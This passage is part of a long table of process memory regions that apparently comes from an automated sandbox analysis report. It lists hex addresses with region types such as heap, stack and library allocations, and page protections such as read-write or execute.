heap
|
page read and write
|
||
|
A1E000
|
stack
|
page read and write
|
||
|
6B3E000
|
stack
|
page read and write
|
||
|
8367000
|
heap
|
page read and write
|
||
|
8375000
|
heap
|
page read and write
|
||
|
1B70E272000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
24335550000
|
heap
|
page read and write
|
||
|
1B710089000
|
heap
|
page read and write
|
||
|
1B710079000
|
heap
|
page read and write
|
||
|
7F70000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B71008E000
|
heap
|
page read and write
|
||
|
B00000
|
unkown
|
page readonly
|
||
|
1B70E239000
|
heap
|
page read and write
|
||
|
1011000
|
unkown
|
page readonly
|
||
|
3097000
|
remote allocation
|
page execute and read and write
|
||
|
2431B4A0000
|
heap
|
page read and write
|
||
|
7BD9000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1B70E223000
|
heap
|
page read and write
|
||
|
307E000
|
stack
|
page read and write
|
||
|
7E00000
|
heap
|
page read and write
|
||
|
1B70FF56000
|
heap
|
page read and write
|
||
|
271040B0000
|
heap
|
page read and write
|
||
|
5F0000
|
unkown
|
page readonly
|
||
|
86E0000
|
direct allocation
|
page read and write
|
||
|
85D0000
|
trusted library allocation
|
page read and write
|
||
|
1B70FF63000
|
heap
|
page read and write
|
||
|
8690000
|
direct allocation
|
page read and write
|
||
|
27105C0C000
|
trusted library allocation
|
page read and write
|
||
|
1B710059000
|
heap
|
page read and write
|
||
|
2431EE54000
|
trusted library allocation
|
page read and write
|
||
|
42F0000
|
heap
|
page read and write
|
||
|
B7A000
|
stack
|
page read and write
|
||
|
A20000
|
unkown
|
page read and write
|
||
|
2432CD81000
|
trusted library allocation
|
page read and write
|
||
|
218D8000
|
unclassified section
|
page execute and read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1F74E000
|
stack
|
page read and write
|
||
|
B7F000
|
stack
|
page read and write
|
||
|
8670000
|
trusted library allocation
|
page execute and read and write
|
||
|
7C7B000
|
heap
|
page read and write
|
||
|
5D0000
|
unkown
|
page readonly
|
||
|
7FFD34950000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DE0000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
3231000
|
heap
|
page read and write
|
||
|
11A0000
|
unkown
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1B710074000
|
heap
|
page read and write
|
||
|
1B710069000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1B710064000
|
heap
|
page read and write
|
||
|
7FFD34AF0000
|
trusted library allocation
|
page read and write
|
||
|
11F0000
|
heap
|
page read and write
|
||
|
520000
|
unkown
|
page readonly
|
||
|
4681000
|
trusted library allocation
|
page read and write
|
||
|
6DFD000
|
stack
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
80D8000
|
trusted library allocation
|
page read and write
|
||
|
2690000
|
unkown
|
page readonly
|
||
|
2431EC0E000
|
trusted library allocation
|
page read and write
|
||
|
3711000
|
direct allocation
|
page execute and read and write
|
||
|
1B71006C000
|
heap
|
page read and write
|
||
|
2FEE000
|
stack
|
page read and write
|
||
|
1B70E22F000
|
heap
|
page read and write
|
||
|
7560000
|
trusted library allocation
|
page read and write
|
||
|
3E72000
|
system
|
page read and write
|
||
|
3070000
|
trusted library allocation
|
page read and write
|
||
|
7C80000
|
heap
|
page read and write
|
||
|
1B7103A0000
|
heap
|
page read and write
|
||
|
1F2D0000
|
direct allocation
|
page read and write
|
||
|
7FFD34990000
|
trusted library allocation
|
page read and write
|
||
|
111C000
|
system
|
page execute and read and write
|
||
|
BC0000
|
unkown
|
page readonly
|
||
|
4DEE000
|
stack
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
2C40000
|
trusted library allocation
|
page read and write
|
||
|
8700000
|
direct allocation
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
191000
|
unkown
|
page execute read
|
||
|
1B710084000
|
heap
|
page read and write
|
||
|
1138000
|
system
|
page execute and read and write
|
||
|
1B70E28E000
|
heap
|
page read and write
|
||
|
2CB8000
|
stack
|
page read and write
|
||
|
24335535000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1B710047000
|
heap
|
page read and write
|
||
|
46E167E000
|
stack
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1B70E223000
|
heap
|
page read and write
|
||
|
7FFD3479D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B70E232000
|
heap
|
page read and write
|
||
|
C4137FE000
|
stack
|
page read and write
|
||
|
A31000
|
unkown
|
page readonly
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
2431CCF0000
|
heap
|
page read and write
|
||
|
24335250000
|
heap
|
page read and write
|
||
|
2DD0000
|
heap
|
page readonly
|
||
|
1B70FF55000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1B70E263000
|
heap
|
page read and write
|
||
|
848C000
|
stack
|
page read and write
|
||
|
2DE0000
|
direct allocation
|
page read and write
|
||
|
710F000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
2FEDCF9000
|
stack
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
524C000
|
stack
|
page read and write
|
||
|
190000
|
unkown
|
page readonly
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
2431B460000
|
heap
|
page readonly
|
||
|
7FFD34A20000
|
trusted library allocation
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
20ADD2A0000
|
heap
|
page read and write
|
||
|
2431D73E000
|
trusted library allocation
|
page read and write
|
||
|
BD8000
|
heap
|
page read and write
|
||
|
465E000
|
stack
|
page read and write
|
||
|
31A0000
|
heap
|
page read and write
|
||
|
305C000
|
unkown
|
page read and write
|
||
|
741E000
|
stack
|
page read and write
|
||
|
3A6C000
|
unclassified section
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
46E11DF000
|
stack
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1B70E35C000
|
heap
|
page read and write
|
||
|
1FBC1000
|
heap
|
page read and write
|
||
|
B90000
|
direct allocation
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1B710030000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
850E000
|
stack
|
page read and write
|
||
|
1B710050000
|
heap
|
page read and write
|
||
|
4DBB000
|
stack
|
page read and write
|
||
|
2CF0000
|
trusted library allocation
|
page read and write
|
||
|
4ACF000
|
stack
|
page read and write
|
||
|
419AFD000
|
stack
|
page read and write
|
||
|
2D30000
|
heap
|
page read and write
|
||
|
2431CE02000
|
trusted library allocation
|
page read and write
|
||
|
1B70E21C000
|
heap
|
page read and write
|
||
|
1B71039E000
|
heap
|
page read and write
|
||
|
1B70FF6B000
|
heap
|
page read and write
|
||
|
414C000
|
system
|
page read and write
|
||
|
1B710035000
|
heap
|
page read and write
|
||
|
1FCEA000
|
heap
|
page read and write
|
||
|
4D0C000
|
stack
|
page read and write
|
||
|
1B70FF6B000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
7BC0000
|
heap
|
page read and write
|
||
|
25A52FF000
|
stack
|
page read and write
|
||
|
2431B33A000
|
heap
|
page read and write
|
||
|
1B70E110000
|
heap
|
page read and write
|
||
|
2DEE000
|
heap
|
page read and write
|
||
|
900000
|
heap
|
page read and write
|
||
|
19E000
|
unkown
|
page readonly
|
||
|
46E119E000
|
stack
|
page read and write
|
||
|
7FFD000
|
stack
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
2431E15B000
|
trusted library allocation
|
page read and write
|
||
|
1F7CB000
|
stack
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
3070000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1B70E29F000
|
heap
|
page read and write
|
||
|
3125000
|
heap
|
page read and write
|
||
|
7FFD34960000
|
trusted library allocation
|
page execute and read and write
|
||
|
818C000
|
stack
|
page read and write
|
||
|
2CCF000
|
stack
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
7C3D000
|
heap
|
page read and write
|
||
|
118F000
|
system
|
page execute and read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
540F000
|
stack
|
page read and write
|
||
|
7FFD34876000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B70E28E000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1FF0E000
|
direct allocation
|
page execute and read and write
|
||
|
25A527F000
|
stack
|
page read and write
|
||
|
7DF469D20000
|
trusted library allocation
|
page execute and read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
7FFD34846000
|
trusted library allocation
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1B70E25E000
|
heap
|
page read and write
|
||
|
2D9E000
|
stack
|
page read and write
|
||
|
7C1C000
|
heap
|
page read and write
|
||
|
29F7000
|
heap
|
page read and write
|
||
|
7C56000
|
heap
|
page read and write
|
||
|
243354F2000
|
heap
|
page read and write
|
||
|
1B70E24E000
|
heap
|
page read and write
|
||
|
2431B300000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
20ADD450000
|
heap
|
page read and write
|
||
|
2431D74C000
|
trusted library allocation
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
2EC8000
|
heap
|
page read and write
|
||
|
4DFA000
|
stack
|
page read and write
|
||
|
2CDD000
|
stack
|
page read and write
|
||
|
1B7100B8000
|
heap
|
page read and write
|
||
|
7CD0000
|
trusted library allocation
|
page read and write
|
||
|
271058E0000
|
trusted library allocation
|
page read and write
|
||
|
2431EBAE000
|
trusted library allocation
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
3670000
|
heap
|
page read and write
|
||
|
4D40000
|
heap
|
page read and write
|
||
|
1A5000
|
unkown
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
834F000
|
stack
|
page read and write
|
||
|
EFC000
|
stack
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
C47000
|
heap
|
page read and write
|
||
|
BD0000
|
direct allocation
|
page read and write
|
||
|
2DFA000
|
heap
|
page read and write
|
||
|
2FEDEFE000
|
stack
|
page read and write
|
||
|
42F8000
|
heap
|
page read and write
|
||
|
1B710051000
|
heap
|
page read and write
|
||
|
86A0000
|
direct allocation
|
page read and write
|
||
|
123F000
|
heap
|
page read and write
|
||
|
85CD000
|
stack
|
page read and write
|
||
|
2431EC0A000
|
trusted library allocation
|
page read and write
|
||
|
C4127FF000
|
stack
|
page read and write
|
||
|
30D7000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
BE0000
|
heap
|
page read and write
|
||
|
85E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34A60000
|
trusted library allocation
|
page read and write
|
||
|
81C8000
|
heap
|
page read and write
|
||
|
6C1A000
|
stack
|
page read and write
|
||
|
42B0000
|
direct allocation
|
page read and write
|
||
|
1F6CF000
|
stack
|
page read and write
|
||
|
530000
|
unkown
|
page readonly
|
||
|
1B710025000
|
heap
|
page read and write
|
||
|
BC0000
|
unkown
|
page readonly
|
||
|
7FFD349F0000
|
trusted library allocation
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
2BFC000
|
stack
|
page read and write
|
||
|
1B71004E000
|
heap
|
page read and write
|
||
|
1B71001D000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
7FFD347B0000
|
trusted library allocation
|
page read and write
|
||
|
4332000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1B70E227000
|
heap
|
page read and write
|
||
|
2DE0000
|
heap
|
page read and write
|
||
|
2FEE3FE000
|
stack
|
page read and write
|
||
|
33B4000
|
heap
|
page read and write
|
||
|
1FD5F000
|
heap
|
page read and write
|
||
|
7BEE000
|
heap
|
page read and write
|
||
|
1B710390000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
4355000
|
heap
|
page read and write
|
||
|
2FEE0FF000
|
stack
|
page read and write
|
||
|
2431CD74000
|
heap
|
page read and write
|
||
|
71BC000
|
heap
|
page read and write
|
||
|
461C000
|
stack
|
page read and write
|
||
|
81B0000
|
heap
|
page read and write
|
||
|
1B70E35E000
|
heap
|
page read and write
|
||
|
1B70FF5C000
|
heap
|
page read and write
|
||
|
1B70E1F0000
|
heap
|
page read and write
|
||
|
1B70E22D000
|
heap
|
page read and write
|
||
|
1F9CC000
|
stack
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
78E000
|
stack
|
page read and write
|
||
|
2C80000
|
heap
|
page read and write
|
||
|
27105C00000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34790000
|
trusted library allocation
|
page read and write
|
||
|
71C0000
|
heap
|
page read and write
|
||
|
1B70E252000
|
heap
|
page read and write
|
||
|
7FFD34930000
|
trusted library allocation
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
71CC000
|
heap
|
page read and write
|
||
|
1B70E260000
|
heap
|
page read and write
|
||
|
100E000
|
stack
|
page read and write
|
||
|
20ADD380000
|
heap
|
page read and write
|
||
|
46D8000
|
trusted library allocation
|
page read and write
|
||
|
1B710035000
|
heap
|
page read and write
|
||
|
29E0000
|
trusted library allocation
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
7570000
|
trusted library allocation
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
8FC000
|
stack
|
page read and write
|
||
|
2431B3F0000
|
heap
|
page read and write
|
||
|
2431E54E000
|
trusted library allocation
|
page read and write
|
||
|
27105C03000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34AC0000
|
trusted library allocation
|
page read and write
|
||
|
6D1A000
|
stack
|
page read and write
|
||
|
1B710061000
|
heap
|
page read and write
|
||
|
8FC000
|
stack
|
page read and write
|
||
|
1B70FF66000
|
heap
|
page read and write
|
||
|
4355000
|
heap
|
page read and write
|
||
|
33B8000
|
heap
|
page read and write
|
||
|
1B710011000
|
heap
|
page read and write
|
||
|
8110000
|
trusted library allocation
|
page read and write
|
||
|
EFC000
|
stack
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
2C8E000
|
stack
|
page read and write
|
||
|
30A0000
|
heap
|
page read and write
|
||
|
29F0000
|
heap
|
page read and write
|
||
|
271040E1000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
CC0000
|
heap
|
page read and write
|
||
|
24335384000
|
heap
|
page read and write
|
||
|
328B000
|
heap
|
page read and write
|
||
|
1FA10000
|
heap
|
page read and write
|
||
|
510000
|
unkown
|
page readonly
|
||
|
306E000
|
stack
|
page read and write
|
||
|
1B710071000
|
heap
|
page read and write
|
||
|
6B95000
|
heap
|
page execute and read and write
|
||
|
3F98000
|
unkown
|
page execute and read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
434D000
|
heap
|
page read and write
|
||
|
BD0000
|
heap
|
page read and write
|
||
|
8630000
|
direct allocation
|
page read and write
|
||
|
4345000
|
heap
|
page read and write
|
||
|
1011000
|
unkown
|
page readonly
|
||
|
7126000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
BB0000
|
unkown
|
page readonly
|
||
|
2431B312000
|
heap
|
page read and write
|
||
|
2780000
|
unkown
|
page execute and read and write
|
||
|
434D000
|
heap
|
page read and write
|
||
|
546E000
|
stack
|
page read and write
|
||
|
7FFD34980000
|
trusted library allocation
|
page execute and read and write
|
||
|
27103EE0000
|
system
|
page execute and read and write
|
||
|
BF0000
|
unkown
|
page read and write
|
||
|
4365000
|
heap
|
page read and write
|
||
|
2431B480000
|
trusted library allocation
|
page read and write
|
||
|
703E000
|
stack
|
page read and write
|
||
|
7F57000
|
stack
|
page read and write
|
||
|
558C000
|
stack
|
page read and write
|
||
|
2CE0000
|
heap
|
page readonly
|
||
|
1B70E1FB000
|
heap
|
page read and write
|
||
|
2431B2B0000
|
heap
|
page read and write
|
||
|
830E000
|
stack
|
page read and write
|
||
|
2C09000
|
trusted library allocation
|
page read and write
|
||
|
86F0000
|
direct allocation
|
page read and write
|
||
|
27105C16000
|
trusted library allocation
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
69FE000
|
stack
|
page read and write
|
||
|
2C7B000
|
stack
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1F6D6FC0000
|
heap
|
page read and write
|
||
|
9F30000
|
direct allocation
|
page execute and read and write
|
||
|
7C26000
|
heap
|
page read and write
|
||
|
3FE6000
|
unclassified section
|
page read and write
|
||
|
74C0000
|
trusted library allocation
|
page read and write
|
||
|
1B70E358000
|
heap
|
page read and write
|
||
|
24335480000
|
heap
|
page read and write
|
||
|
B00000
|
unkown
|
page readonly
|
||
|
2D3C000
|
heap
|
page read and write
|
||
|
243352CA000
|
heap
|
page read and write
|
||
|
419BFF000
|
unkown
|
page read and write
|
||
|
1B710010000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1B70E222000
|
heap
|
page read and write
|
||
|
7BF1000
|
heap
|
page read and write
|
||
|
20041000
|
direct allocation
|
page execute and read and write
|
||
|
1B70E250000
|
heap
|
page read and write
|
||
|
1FA11000
|
heap
|
page read and write
|
||
|
243354A9000
|
heap
|
page read and write
|
||
|
1320000
|
unkown
|
page readonly
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
30A5000
|
heap
|
page read and write
|
||
|
52CE000
|
stack
|
page read and write
|
||
|
1B710020000
|
heap
|
page read and write
|
||
|
2DC0000
|
heap
|
page read and write
|
||
|
840E000
|
stack
|
page read and write
|
||
|
435F000
|
heap
|
page read and write
|
||
|
1B70E35A000
|
heap
|
page read and write
|
||
|
2003D000
|
direct allocation
|
page execute and read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
2DDF000
|
stack
|
page read and write
|
||
|
1060000
|
heap
|
page read and write
|
||
|
29E4000
|
trusted library allocation
|
page read and write
|
||
|
4CA0000
|
heap
|
page read and write
|
||
|
1B70E22A000
|
heap
|
page read and write
|
||
|
7FFD34A80000
|
trusted library allocation
|
page read and write
|
||
|
2990000
|
heap
|
page read and write
|
||
|
46E147E000
|
stack
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
21945000
|
unclassified section
|
page execute and read and write
|
||
|
7580000
|
trusted library allocation
|
page read and write
|
||
|
C40000
|
heap
|
page read and write
|
||
|
2C20000
|
trusted library allocation
|
page read and write
|
||
|
200C0000
|
unclassified section
|
page execute and read and write
|
||
|
6DBE000
|
stack
|
page read and write
|
||
|
520000
|
unkown
|
page readonly
|
||
|
1B7100A1000
|
heap
|
page read and write
|
||
|
27103F23000
|
system
|
page execute and read and write
|
||
|
1FA0C000
|
stack
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
7CC0000
|
trusted library allocation
|
page read and write
|
||
|
8360000
|
heap
|
page read and write
|
||
|
2C22000
|
trusted library allocation
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
6E3B000
|
stack
|
page read and write
|
||
|
3792000
|
unclassified section
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1B70FC00000
|
heap
|
page read and write
|
||
|
1220000
|
heap
|
page read and write
|
||
|
8361000
|
heap
|
page read and write
|
||
|
6B90000
|
heap
|
page execute and read and write
|
||
|
81CD000
|
stack
|
page read and write
|
||
|
73DE000
|
stack
|
page read and write
|
||
|
2431B3AE000
|
heap
|
page read and write
|
||
|
29B0000
|
trusted library section
|
page read and write
|
||
|
2431CD81000
|
trusted library allocation
|
page read and write
|
||
|
1113000
|
system
|
page execute and read and write
|
||
|
BD0000
|
heap
|
page read and write
|
||
|
1B7100B8000
|
heap
|
page read and write
|
||
|
BD0000
|
direct allocation
|
page read and write
|
||
|
2DF5000
|
heap
|
page read and write
|
||
|
1060000
|
heap
|
page read and write
|
||
|
7FFD347EC000
|
trusted library allocation
|
page execute and read and write
|
||
|
2EC0000
|
heap
|
page read and write
|
||
|
2431B2F8000
|
heap
|
page read and write
|
||
|
1B70E223000
|
heap
|
page read and write
|
||
|
1B710086000
|
heap
|
page read and write
|
||
|
8040000
|
heap
|
page read and write
|
||
|
7BF3000
|
heap
|
page read and write
|
||
|
1B710081000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
BD0000
|
direct allocation
|
page read and write
|
||
|
3782000
|
direct allocation
|
page execute and read and write
|
||
|
1F6D70E0000
|
heap
|
page read and write
|
||
|
1B70FF5F000
|
heap
|
page read and write
|
||
|
31FF000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
2580000
|
heap
|
page read and write
|
||
|
16B1000
|
unkown
|
page readonly
|
||
|
74D0000
|
trusted library allocation
|
page read and write
|
||
|
47D5000
|
trusted library allocation
|
page read and write
|
||
|
1B710055000
|
heap
|
page read and write
|
||
|
7C21000
|
heap
|
page read and write
|
||
|
817E000
|
heap
|
page read and write
|
||
|
292E000
|
stack
|
page read and write
|
||
|
7FFD34A40000
|
trusted library allocation
|
page read and write
|
||
|
2431D298000
|
trusted library allocation
|
page read and write
|
||
|
A40000
|
unkown
|
page read and write
|
||
|
46E1AFE000
|
stack
|
page read and write
|
||
|
2E00000
|
heap
|
page read and write
|
||
|
1B710035000
|
heap
|
page read and write
|
||
|
1B7100B4000
|
heap
|
page read and write
|
||
|
2DFA000
|
heap
|
page read and write
|
||
|
190000
|
unkown
|
page readonly
|
||
|
2D00000
|
trusted library allocation
|
page read and write
|
||
|
1B71004E000
|
heap
|
page read and write
|
||
|
8374000
|
heap
|
page read and write
|
||
|
435E000
|
heap
|
page read and write
|
||
|
71F7000
|
trusted library allocation
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
836D000
|
heap
|
page read and write
|
||
|
302E000
|
stack
|
page read and write
|
||
|
1B710096000
|
heap
|
page read and write
|
||
|
1B70FF6B000
|
heap
|
page read and write
|
||
|
8F31000
|
trusted library allocation
|
page read and write
|
||
|
BD8000
|
heap
|
page read and write
|
||
|
4D69000
|
stack
|
page read and write
|
||
|
1B710086000
|
heap
|
page read and write
|
||
|
46E254E000
|
stack
|
page read and write
|
||
|
7F60000
|
heap
|
page read and write
|
||
|
1B70E226000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
8120000
|
heap
|
page read and write
|
||
|
580A000
|
trusted library allocation
|
page read and write
|
||
|
8172000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
191000
|
unkown
|
page execute read
|
||
|
5C0F000
|
stack
|
page read and write
|
||
|
4E7E000
|
stack
|
page read and write
|
||
|
5F0000
|
unkown
|
page readonly
|
||
|
7FFD34AD0000
|
trusted library allocation
|
page read and write
|
||
|
340E000
|
stack
|
page read and write
|
||
|
81C5000
|
heap
|
page read and write
|
||
|
7FFD347A0000
|
trusted library allocation
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
435A000
|
heap
|
page read and write
|
||
|
46E111E000
|
stack
|
page read and write
|
||
|
1B70E22A000
|
heap
|
page read and write
|
||
|
1B710051000
|
heap
|
page read and write
|
||
|
356D000
|
direct allocation
|
page execute and read and write
|
||
|
2C10000
|
trusted library allocation
|
page read and write
|
||
|
2DEE000
|
heap
|
page read and write
|
||
|
BF1000
|
heap
|
page read and write
|
||
|
1040000
|
unkown
|
page readonly
|
||
|
271040CC000
|
heap
|
page read and write
|
||
|
8382000
|
heap
|
page read and write
|
||
|
3227000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
7C61000
|
heap
|
page read and write
|
||
|
7340000
|
trusted library allocation
|
page read and write
|
||
|
1B70E21F000
|
heap
|
page read and write
|
||
|
2FEE4FE000
|
stack
|
page read and write
|
||
|
7FFD348B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7C55000
|
heap
|
page read and write
|
||
|
1B70FFA3000
|
heap
|
page read and write
|
||
|
46E25CE000
|
stack
|
page read and write
|
||
|
1B710019000
|
heap
|
page read and write
|
||
|
B7A000
|
stack
|
page read and write
|
||
|
1320000
|
unkown
|
page readonly
|
||
|
54AF000
|
stack
|
page read and write
|
||
|
1F8A0000
|
heap
|
page read and write
|
||
|
370D000
|
direct allocation
|
page execute and read and write
|
||
|
B10000
|
unkown
|
page readonly
|
||
|
2470000
|
unkown
|
page read and write
|
||
|
200B2000
|
direct allocation
|
page execute and read and write
|
||
|
2431E832000
|
trusted library allocation
|
page read and write
|
||
|
24335380000
|
heap
|
page read and write
|
||
|
4E5B000
|
stack
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
54EB000
|
stack
|
page read and write
|
||
|
27105DC4000
|
trusted library allocation
|
page read and write
|
||
|
510000
|
unkown
|
page readonly
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
42AF000
|
stack
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
46E274B000
|
stack
|
page read and write
|
||
|
8640000
|
direct allocation
|
page read and write
|
||
|
2D99000
|
stack
|
page read and write
|
||
|
2DFA000
|
heap
|
page read and write
|
||
|
42C0000
|
direct allocation
|
page read and write
|
||
|
1B70E29D000
|
heap
|
page read and write
|
||
|
3250000
|
trusted library allocation
|
page read and write
|
||
|
27105A90000
|
heap
|
page read and write
|
||
|
113B000
|
system
|
page execute and read and write
|
||
|
2E33000
|
heap
|
page read and write
|
||
|
2DE4000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
4005000
|
unkown
|
page execute and read and write
|
||
|
1B70E252000
|
heap
|
page read and write
|
||
|
1B710044000
|
heap
|
page read and write
|
||
|
2D4A000
|
heap
|
page read and write
|
||
|
7FFD34794000
|
trusted library allocation
|
page read and write
|
||
|
1B70E0F0000
|
heap
|
page read and write
|
||
|
20ADEFE0000
|
heap
|
page read and write
|
||
|
2DE7000
|
heap
|
page read and write
|
||
|
6A7E000
|
stack
|
page read and write
|
||
|
2BBF000
|
stack
|
page read and write
|
||
|
816A000
|
heap
|
page read and write
|
||
|
86C0000
|
direct allocation
|
page read and write
|
||
|
1B7100AE000
|
heap
|
page read and write
|
||
|
2D10000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B70E27F000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
8370000
|
heap
|
page read and write
|
||
|
7337000
|
trusted library allocation
|
page read and write
|
||
|
1B7100B8000
|
heap
|
page read and write
|
||
|
7FFD34A30000
|
trusted library allocation
|
page read and write
|
||
|
24335349000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
7FFD34B20000
|
trusted library allocation
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
2431EBA4000
|
trusted library allocation
|
page read and write
|
||
|
53CE000
|
stack
|
page read and write
|
||
|
70E0000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1F68E000
|
stack
|
page read and write
|
||
|
641E000
|
stack
|
page read and write
|
||
|
1B71009E000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
80C6000
|
trusted library allocation
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
2EC5000
|
heap
|
page read and write
|
||
|
434D000
|
heap
|
page read and write
|
||
|
A9C7000
|
direct allocation
|
page execute and read and write
|
||
|
824F000
|
stack
|
page read and write
|
||
|
2431B39B000
|
heap
|
page read and write
|
||
|
27105DBE000
|
trusted library allocation
|
page read and write
|
||
|
1B710035000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
1B70E240000
|
heap
|
page read and write
|
||
|
6E40000
|
heap
|
page read and write
|
||
|
4EC0000
|
heap
|
page read and write
|
||
|
1B70E35C000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
70BF000
|
stack
|
page read and write
|
||
|
1B70E28E000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
820E000
|
stack
|
page read and write
|
||
|
2D70000
|
heap
|
page read and write
|
||
|
2431E86C000
|
trusted library allocation
|
page read and write
|
||
|
1F84E000
|
stack
|
page read and write
|
||
|
6ABE000
|
stack
|
page read and write
|
||
|
1B70E24B000
|
heap
|
page read and write
|
||
|
3180000
|
unkown
|
page execute and read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
30D1000
|
heap
|
page read and write
|
||
|
31F7000
|
heap
|
page read and write
|
||
|
2C84000
|
heap
|
page read and write
|
||
|
7231000
|
heap
|
